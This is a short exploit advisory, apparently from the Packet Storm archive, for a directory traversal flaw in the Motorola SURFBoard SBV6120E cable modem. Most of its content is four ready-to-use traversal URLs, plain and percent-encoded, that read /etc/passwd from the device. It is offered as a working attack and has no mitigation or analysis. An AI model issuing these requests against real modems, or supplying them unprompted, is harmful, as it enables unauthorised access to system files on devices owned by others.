Motorola SURFBoard Cable Modem Directory Traversal

2010-06-04T00:00:00
ID PACKETSTORM:90280
Type packetstorm
Reporter S2 Crew
Modified 2010-06-04T00:00:00

Description

                                        
                                            `  
  
# Exploit Title: Motorola SURFBoard Cable Modem Directory Traversal  
# Date: 2010.06.03  
# Author: S2 Crew [Hungary]  
# Software Link: -  
# Version: Model name: SBV6120E, Firmware Name: SBV6X2X-1.0.0.5-SCM-02-SHPC  
# Tested on: ^  
# CVE: -  
# Code :  
  
The following urls get back the /etc/passwd file from the modem:  
  
http://[IP]///etc/passwd <http://[ip]///etc/passwd>  
http://[IP]/../../etc/passwd  
  
http://[IP]/..%2f..%2fetc/passwd <http://[ip]/..%2f..%2fetc/passwd>  
http://[IP]/%2e%2e/%2e%2e/etc/passwd  
  
  
  
`